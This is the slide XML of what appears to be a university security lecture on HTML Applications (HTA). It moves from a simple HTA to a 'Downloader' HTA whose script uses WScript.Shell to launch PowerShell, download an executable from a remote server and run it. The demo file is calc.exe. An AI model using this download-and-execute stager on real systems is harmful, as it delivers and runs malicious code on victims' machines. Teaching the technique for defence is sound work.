            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Si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996950"/>
            <a:ext cx="5756064" cy="343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909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560" y="2459443"/>
            <a:ext cx="6840760" cy="897549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>To make this a into an Application we just need to change the file extension to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> and add a new tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTA:APPLICATION /&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>This can contain many attributes and must appear in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;head&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> of the page.</a:t>
            </a:r>
          </a:p>
          <a:p>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="971600" y="338328"/>
            <a:ext cx="7200800" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Create a Simple HTA – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Step 3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alex Hedley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827584" y="3227199"/>
            <a:ext cx="6408712"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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9pPr fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr kumimoji="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs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&lt;!DOCTYPE html&gt;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&lt;html lang="en"&gt;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&lt;head&gt;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    &lt;title&gt;A Simple HTA Application&lt;/title&gt;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   &lt;HTA:APPLICATION</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        APPLICATIONNAME = "A Simple HTA Application“</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        ICON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= "599CD.ico"</a:t>
            </a:r>
            <a:endPar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    /&gt;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&lt;/head&gt;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&lt;body&gt;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    &lt;h1&gt;Heading&lt;/h1&gt;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    &lt;p&gt;This is a paragraph.&lt;/p&gt;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&lt;/body&gt;</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zh-TW" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2844205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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Create a Simple HTA – Step  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Alex Hedley</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="Simple H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4100" name="Picture 4" descr="Simple H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08920"/>
            <a:ext cx="51530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77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0" y="1988840"/>
            <a:ext cx="8712967" cy="4320479"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;html&gt;</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&lt;title&gt;Downloader&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head&gt;</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&lt;HTA:APPLICATION</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APPLICATIONNAME="Downloader"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;</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//We will use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wscript.shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> in order to launch PowerShell</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a = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Wscript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>');</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//Our command to execute</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = "powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NoExit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -command (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DownloadFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('https://staff.csie.ncu.edu.tw/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hsufh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/COURSES/SPRING2022/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc.exe','C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> H\Desktop\test1.exe'); Start-Process ('C:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> H\Desktop\test1.exe')"</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//Run the command, 0 is needed so that no PowerShell window will appear</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cmd,1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Download and Execute a Remote File Using a HTA File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>cyber one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2267744" y="5517232"/>
            <a:ext cx="6696744" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This HTA file downloads an executable from a remote server and executes the download file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>test1.hta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> used in slide 20. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
